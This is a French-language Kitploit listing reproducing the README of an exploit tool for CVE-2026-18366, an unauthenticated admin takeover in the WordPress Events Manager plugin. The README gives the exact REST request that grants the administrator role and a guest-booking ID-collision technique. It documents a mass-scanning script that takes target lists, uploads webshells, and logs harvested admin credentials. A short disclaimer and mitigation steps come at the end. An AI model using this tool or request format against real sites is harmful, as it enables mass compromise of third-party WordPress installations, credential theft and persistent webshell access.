Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-18366 — Events Manager < 7.4.1 - Élévation de privilèges non authentifiée vers Administrateur | Kitploit
Outils/GitHubGitHub/nxploited/cve-2026-18366
Escalade de PrivilègesScanners de Vulnérabilités WebExploitationExploitation d'Applications WebCollecte d'InformationsPost-Exploitation
GitHubnxploited/cve-2026-18366

CVE-2026-18366

Events Manager < 7.4.1 - Élévation de privilèges non authentifiée vers Administrateur

Voir le dépôt
11il y a 23 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-18366

Events Manager < 7.4.1 - Élévation de privilèges non authentifiée vers Administrateur

CVE CVSS WordPress

Typing SVG


🔗 Restez informé

Telegram

Pour les dernières zero-days, exploits et recherches en sécurité

Telegram Channel


📋 Aperçu de la vulnérabilité


🔍 Description technique

Analyse de la cause racine

La vulnérabilité se trouve dans EM\Archetypes::map_meta_cap dans classes/em-archetypes.php. Le plugin ne restreint pas correctement son mappage de capacités :

  1. Traitant TOUT ID d'objet comme un ID de post
  2. Si la publication est un CPT event ou location, il efface $caps = []
  3. Ne reconstitue jamais les capacités pour edit_user, delete_user ou promote_user
  4. Capacités vides → has_cap() renvoie true, y compris pour l'utilisateur 0 (invité)

Vecteur d'attaque

root@kitploit:~
POST|PUT|PATCH  /wp-json/wp/v2/users/{id}
POST            /index.php?rest_route=/wp/v2/users/{id}

Body: {"password":"...","roles":["administrator"]}

Condition : {id} doit être égal à wp_posts.ID d'un CPT event ou location.

⚠️ L'API REST non authentifiée ne requiert pas de nonce (aucun cookie de session).

Exploitation des réservations invitées

Les réservations invitées (dbem_bookings_anonymous=1 par défaut) créent de vrais utilisateurs WP, permettant de forcer une collision. Le nonce de réservation est publiquement disponible sur les formulaires d'événements.


🚀 Utilisation

Prérequis

root@kitploit:~
pip install aiohttp

Démarrage rapide

root@kitploit:~
python CVE-2026-18366.py

Le script demandera :

  • list → Chemin vers le fichier de liste de cibles (défaut : list.txt)
  • speed → Nombre de workers concurrents (défaut : 10)

Options de ligne de commande

root@kitploit:~
python CVE-2026-18366.py -l targets.txt -s 20 --timeout 30
OptionDescription
-l, --listChemin vers le fichier contenant les URL cibles
-s, --speedNombre de workers concurrents (1-200)
--timeoutDélai d'expiration des requêtes en secondes (défaut : 20)

Format de la liste de cibles

Créez un fichier list.txt avec une cible par ligne :

root@kitploit:~
https://target1.com
https://target2.com/wordpress
http://target3.com
target4.com

📊 Sortie

Sortie console

root@kitploit:~
[+] [HH:MM:SS] target.com  ADMIN  username:password  uid=X  path
[+] [HH:MM:SS] target.com  SHELL  https://target.com/wp-content/plugins/...

Fichier de résultats

Les compromissions réussies sont enregistrées dans adminS.txt :

root@kitploit:~
https://target.com | username:Nx_admin_@!KSA | uid=X | path=id-collision | ADMIN | shell_url

🔄 Flux d'exploitation

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│                    CVE-2026-18366 Flow                          │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  ┌──────────┐    ┌─────────────┐    ┌──────────────────────┐   │
│  │  Detect  │ →  │ Collect IDs │ →  │  PATH A: ID Brute    │   │
│  │  Plugin  │    │  (CPT/HTML) │    │  REST /users/{id}    │   │
│  └──────────┘    └─────────────┘    └──────────┬───────────┘   │
│                                                 │               │
│                                          ┌──────▼──────┐        │
│                                          │   Success?  │        │
│                                          └──────┬──────┘        │
│                                       No │      │ Yes           │
│                               ┌──────────▼──────▼──────────┐    │
│                               │                            │    │
│  ┌──────────────────────┐     │    ┌─────────────────┐     │    │
│  │  PATH B: Guest Book  │ ←───┘    │  Login + Verify │     │    │
│  │  Create user until   │          │  Admin Access   │     │    │
│  │  user_id == post_id  │          └────────┬────────┘     │    │
│  └──────────────────────┘                   │              │    │
│                                    ┌────────▼────────┐     │    │
│                                    │  Upload Shell   │     │    │
│                                    │  (Plugin/Theme) │     │    │
│                                    └────────┬────────┘     │    │
│                                             │              │    │
│                                    ┌────────▼────────┐     │    │
│                                    │   Save Results  │     │    │
│                                    │   adminS.txt    │     │    │
│                                    └─────────────────┘     │    │
│                                                            │    │
└────────────────────────────────────────────────────────────────┘

⚙️ Fonctionnalités

  • Architecture asynchrone → Analyse concurrente haute performance
  • Double voie d'attaque → Collision d'ID + exploitation des réservations invitées
  • Téléversement automatique de shell → Déploiement d'un webshell dans le plugin/thème
  • Détection de version → Identification automatique des versions vulnérables
  • Énumération intelligente des noms d'utilisateur → Multiples techniques d'énumération
  • Vérification de connexion → Validation par cookie + XML-RPC
  • Élévation de privilèges → Promotion automatique en administrateur

📁 Structure des fichiers

root@kitploit:~
├── CVE-2026-18366.py    # Main exploit script
├── list.txt             # Target URLs (create this)
├── adminS.txt           # Successful results (auto-created)
└── README.md            # This documentation

⚠️ Avertissement

root@kitploit:~
╔══════════════════════════════════════════════════════════════════╗
║                        LEGAL DISCLAIMER                          ║
╠══════════════════════════════════════════════════════════════════╣
║                                                                  ║
║  This tool is provided for EDUCATIONAL and AUTHORIZED           ║
║  SECURITY TESTING purposes only.                                ║
║                                                                  ║
║  • Only use on systems you own or have explicit permission      ║
║  • Unauthorized access to computer systems is ILLEGAL           ║
║  • The author is NOT responsible for any misuse or damage       ║
║  • By using this tool, you agree to these terms                 ║
║                                                                  ║
║  Use responsibly. Stay ethical. Respect the law.                ║
║                                                                  ║
╚══════════════════════════════════════════════════════════════════╝

🛡️ Atténuation

Si vous êtes un administrateur WordPress :

  1. Mettez à jour Events Manager vers la version 7.4.1 ou ultérieure
  2. Auditez les comptes utilisateurs pour détecter les modifications non autorisées
  3. Examinez les journaux d'accès pour toute activité suspecte de l'API REST
  4. Implémentez des règles WAF pour filtrer les requêtes malveillantes

👤 Auteur

Nxploited (Khaled Alenzi)

Telegram


Recherche en sécurité • Hacking éthique • Découverte de zero-day

Télécharger l’outil
AttributDétails
CVE IDCVE-2026-18366
Gravité🔴 CRITIQUE (CVSS 9.8)
PluginEvents Manager pour WordPress
Versions affectées< 7.4.1
Type de vulnérabilitéÉlévation de privilèges non authentifiée
Vecteur d'attaqueRéseau
Authentification requiseAucune